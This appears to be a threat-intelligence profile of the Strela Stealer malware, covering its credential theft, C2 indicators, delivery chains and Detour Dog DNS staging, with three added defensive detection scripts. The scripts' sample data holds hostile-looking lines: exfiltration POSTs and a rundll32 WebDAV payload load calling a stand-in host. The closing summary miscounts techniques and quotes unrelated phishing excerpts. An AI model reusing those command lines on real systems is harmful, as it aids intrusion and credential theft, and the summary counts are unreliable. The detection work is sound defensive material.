Strela Stealer
Strela Stealer is an information-stealing malware family focused on harvesting email client credentials, specifically from Microsoft Outlook and Mozilla Thunderbird. Reported theft includes Thunderbird credentials from %APPDATA%\Thunderbird\Profiles\logins.json and key4.db, and Outlook IMAP credentials from registry locations, with password decryption via CryptUnprotectData(). IBM X-Force reported exfiltration over HTTP POST to a hardcoded C2 endpoint at http://94.159.113[.]48/server.php, with repeated transmission attempts until a stop string such as "KH," "ANTIROK," or "CHOLLIMA" is received.
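The exfiltration pattern described above (repeated HTTP POSTs to a hardcoded, bare-IP endpoint until a stop string arrives) is something a defender can hunt for in proxy logs. The following is an added detection example, not code from IBM X-Force or any other cited vendor; the log format, the TEST-NET address 203.0.113.5 and the client addresses are constructed for illustration, and the window and threshold are tunable assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address

# Constructed proxy log lines (not real telemetry). Assumed format:
# "<ISO timestamp> <client ip> <method> <url> <status> <bytes sent>"
SAMPLE_LOGS = """\
2025-01-15T09:00:01 10.0.0.7 POST http://203.0.113.5/server.php 200 4120
2025-01-15T09:00:13 10.0.0.7 POST http://203.0.113.5/server.php 200 4120
2025-01-15T09:00:26 10.0.0.7 POST http://203.0.113.5/server.php 200 4120
2025-01-15T09:00:38 10.0.0.7 POST http://203.0.113.5/server.php 200 4120
2025-01-15T09:01:02 10.0.0.9 GET http://intranet.example/index.php 200 512
2025-01-15T09:01:30 10.0.0.9 POST https://mail.example.com/owa/auth 302 900
2025-01-15T09:02:00 10.0.0.7 POST http://203.0.113.5/server.php 200 4120
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) "
    r"(?P<status>\d{3}) (?P<bytes>\d+)$"
)
URL_RE = re.compile(r"^https?://(?P<host>[^/:]+)(?::\d+)?(?P<path>/[^?]*)?")


def is_bare_ip(host: str) -> bool:
    """True when the URL host is a literal IP rather than a hostname."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def parse_line(line: str):
    """Split one proxy log line into its fields; None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    u = URL_RE.match(m["url"])
    if not u:
        return None
    return {
        "ts": datetime.fromisoformat(m["ts"]),
        "src": m["src"],
        "method": m["method"],
        "host": u["host"],
        "path": u["path"] or "/",
        "bytes": int(m["bytes"]),
    }


def find_beaconing(log_text: str, min_posts: int = 3,
                   window: timedelta = timedelta(minutes=5)):
    """Return (src, host, path, count) for each client that POSTed to the same
    bare-IP endpoint at least `min_posts` times inside any `window`-long span.
    Repeated POSTs to one raw-IP URL are the behaviour reported for the stealer's
    send-until-stop-string loop."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev and ev["method"] == "POST" and is_bare_ip(ev["host"]):
            events[(ev["src"], ev["host"], ev["path"])].append(ev["ts"])

    hits = []
    for key, stamps in events.items():
        stamps.sort()
        lo, best = 0, 0
        # sliding window over the sorted timestamps for this (src, host, path)
        for hi in range(len(stamps)):
            while stamps[hi] - stamps[lo] > window:
                lo += 1
            best = max(best, hi - lo + 1)
        if best >= min_posts:
            hits.append((*key, best))
    return hits


if __name__ == "__main__":
    for src, host, path, n in find_beaconing(SAMPLE_LOGS):
        print(f"{src} -> {host}{path}: {n} POSTs within window")
```

The heuristic keys on a raw IP in the URL because the reported C2 is addressed by IP rather than by domain; in an environment where internal services are also reached by IP, add an allow-list of known destinations before alerting.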
The malware is associated with the financially motivated threat actor Hive0145, which IBM assessed may be the sole operator and likely functions as an initial access broker. Campaigns have targeted victims across Europe since at least late 2022, with reporting specifically naming Spain, Germany, Ukraine, Austria, Liechtenstein, Luxembourg, and Switzerland. Trustwave SpiderLabs and IBM both described targeting of Outlook and Thunderbird users, and Proton66-hosted infrastructure was reported as being used to distribute Strela Stealer in early 2025.
Observed delivery is primarily phishing-based. Hive0145 used invoice and receipt lures, including authentic stolen invoice emails whose attachments were replaced with malicious payloads while preserving the original email content and filename pattern. Infection chains included archives containing heavily obfuscated JavaScript downloaders that retrieved and executed crypted Strela Stealer DLLs, often via WebDAV and rundll32.exe. Earlier campaigns used polyglot files, encrypted ZIP archives with per-email passwords, uncommon executable extensions such as .com and .pif, valid code-signing certificates, and a custom crypter/loader referred to as Stellar Crypter or Stellar Loader, which decrypts and executes the payload in memory. Recent variants reportedly added host profiling via systeminfo output and installed-application enumeration, along with expanded language and locale checks.
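The delivery chain above leaves several process-creation artifacts: a script host launching JavaScript from an archive extraction directory, rundll32.exe loading a DLL over a WebDAV UNC path, and executables with uncommon extensions such as .com or .pif. The following is an added detection example written for this page, not code from any of the cited vendors; the event field names follow the common Image / CommandLine / ParentImage shape, and every path, host (203.0.113.5) and filename in the sample events is constructed.

```python
import re

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" '
                    r'"C:\Users\alice\AppData\Local\Temp\Temp1_invoice_4821.zip\invoice_4821.js"',
     "ParentImage": r"C:\Program Files\7-Zip\7zFM.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe \\203.0.113.5@8888\DavWWWRoot\payload.dll,Entry",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Users\alice\Downloads\report.pif",
     "CommandLine": r"C:\Users\alice\Downloads\report.pif",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# WebDAV UNC syntax: \\host@port\..., \\host@SSL\..., \\host@SSL@port\..., or a
# path containing the DavWWWRoot virtual directory.
WEBDAV_RE = re.compile(r"\\\\[^\\\s@]+@(?:ssl@?)?\d*\\|\\DavWWWRoot\\", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXT_RE = re.compile(r"\.(?:js|jse|wsf|vbs)\b", re.I)
USER_WRITABLE_RE = re.compile(r"\\(?:Temp|Downloads|INetCache)\\", re.I)
UNCOMMON_EXE_RE = re.compile(r"\.(?:com|pif|scr)$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the detection labels that apply to one process-creation event."""
    labels = []
    image = basename(event["Image"])
    cmd = event["CommandLine"]
    # rundll32 pulling its DLL from a WebDAV share (reported delivery technique)
    if image == "rundll32.exe" and WEBDAV_RE.search(cmd):
        labels.append("rundll32_webdav_dll_load")
    # script host running a script from a temp/download/archive extraction path
    if image in SCRIPT_HOSTS and SCRIPT_EXT_RE.search(cmd) and USER_WRITABLE_RE.search(cmd):
        labels.append("script_host_from_user_writable_path")
    # executables with uncommon extensions (.com, .pif, .scr) launched directly
    if UNCOMMON_EXE_RE.search(event["Image"]):
        labels.append("uncommon_executable_extension")
    return labels


def scan(events: list) -> list:
    """Return (index, labels) for every event that triggers at least one label."""
    hits = []
    for i, ev in enumerate(events):
        labels = classify(ev)
        if labels:
            hits.append((i, labels))
    return hits


if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS):
        print(idx, basename(SAMPLE_EVENTS[idx]["Image"]), labels)
```

The rundll32-over-WebDAV rule is the highest-signal of the three; the script-host and extension rules are noisier and are better used for correlation (for example, wscript.exe as the parent of the rundll32 event, as in the sample) than as stand-alone alerts.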
Strela Stealer has also been distributed through infrastructure operated by Detour Dog, which Infoblox described as a service provider or partner rather than the malware operator. Detour Dog used compromised WordPress sites, DNS TXT-record-based command and control, and a first-stage backdoor/reverse shell called StarFish to facilitate delivery. Infoblox reported Base64-encoded TXT responses containing the word "down" to trigger remote file execution behavior on infected sites, which then retrieved content from verified Strela Stealer C2 infrastructure. Spam delivery in these campaigns was linked to REM Proxy and Tofsee botnets, while Detour Dog hosted much of the first-stage infrastructure.
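The Detour Dog technique above (Base64-encoded DNS TXT answers whose decoded text contains "down" to trigger fetching from the stealer's C2) can be hunted for in DNS resolver logs. The following is an added detection example for this page, not Infoblox's tooling; the log format and every domain, address and TXT value in the sample lines are constructed, and the trigger word list contains only the token named in the reporting.

```python
import base64
import binascii
import re

# Constructed DNS response log lines (not real telemetry). Assumed format:
# "<ts> <client> <qname> <qtype> "<rdata>""
# The second line decodes to: down http://203.0.113.5/server.php
# The last line decodes to:   up 2025-01-15
SAMPLE_DNS = """\
2025-01-15T09:05:01 192.0.2.10 _dmarc.example.com TXT "v=DMARC1; p=reject"
2025-01-15T09:05:04 192.0.2.10 cdn-check.example.net TXT "ZG93biBodHRwOi8vMjAzLjAuMTEzLjUvc2VydmVyLnBocA=="
2025-01-15T09:05:09 192.0.2.10 example.org TXT "google-site-verification=abc123"
2025-01-15T09:05:15 192.0.2.10 health.example.net TXT "dXAgMjAyNS0wMS0xNQ=="
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<qname>\S+) (?P<qtype>[A-Z]+) "(?P<rdata>[^"]*)"$'
)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
URL_RE = re.compile(r"https?://\S+")
TRIGGER_WORDS = {"down"}  # token reported in the Detour Dog TXT responses


def decode_txt(rdata: str):
    """Return the decoded text when rdata is well-formed Base64 that decodes to
    printable ASCII; otherwise None. DMARC/SPF/site-verification records fail
    the Base64 shape test and are skipped."""
    if not B64_RE.match(rdata) or len(rdata) % 4:
        return None
    try:
        raw = base64.b64decode(rdata, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_suspicious_txt(log_text: str) -> list:
    """Return (qname, decoded_text, urls) for TXT answers whose decoded content
    carries a trigger word; urls lists any URLs embedded in the decoded text,
    which are the pivot to the second-stage infrastructure."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["qtype"] != "TXT":
            continue
        decoded = decode_txt(m["rdata"])
        if decoded is None:
            continue
        tokens = set(decoded.lower().split())
        if tokens & TRIGGER_WORDS:
            hits.append((m["qname"], decoded, URL_RE.findall(decoded)))
    return hits


if __name__ == "__main__":
    for qname, text, urls in find_suspicious_txt(SAMPLE_DNS):
        print(f"{qname}: {text!r} urls={urls}")
```

Because legitimate TXT records also carry Base64 (DKIM keys, for instance), the decoder alone is not an alert; the trigger-word match and the presence of a URL in the decoded text are what narrow it, and pairing the hit with domain age or rarity further reduces noise.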
High-confidence infrastructure and indicators cited in public reporting include the Strela Stealer C2 endpoint 94.159.113[.]48/server.php, WebDAV delivery from 94.159.113[.]48:8888, and the Detour Dog sinkholed C2 domains webdmonitor[.]io and aeroarrows[.]io associated with Strela-related delivery operations.
Groups observed using it
2 distinct threat actors attributed by public researchers.
A threat actor named Detour Dog has been outed as powering campaigns distributing an information stealer known as Strela Stealer.
Techniques & procedures
3 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (1 technique): phishing-based delivery. Supporting excerpts from public reporting: "Cybersecurity Training Programs Don’t Prevent Employees from Falling for Phishing Scams"; "After sending 10 different types of phishing emails..."; "...servers... resolve multiple domains used for phishing purpose."; "...use of phishing and fake app stores..."; "...email attachment."
Credential Access (1 technique): harvesting of stored email client credentials, as described in the family summary above.
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains, and DNS infrastructure linked to this family as well as other indicator types observed in public reporting.
Recent activity
10 sources tracked across advisories, community write-ups, and news.
Infostealer malware distributed via DNS-based attacks, capable of stealing credentials and sensitive information from infected hosts. Delivered through compromised websites using DNS TXT records as covert C2 and payload delivery channels.
Information-stealing malware delivered via compromised WordPress sites, used to exfiltrate sensitive data from infected systems.
Stealer malware referenced as being used in campaigns powered by 'Detour Dog' DNS malware.
Information-stealing malware referenced in connection with Detour Dog’s DNS-based staging/distribution technique.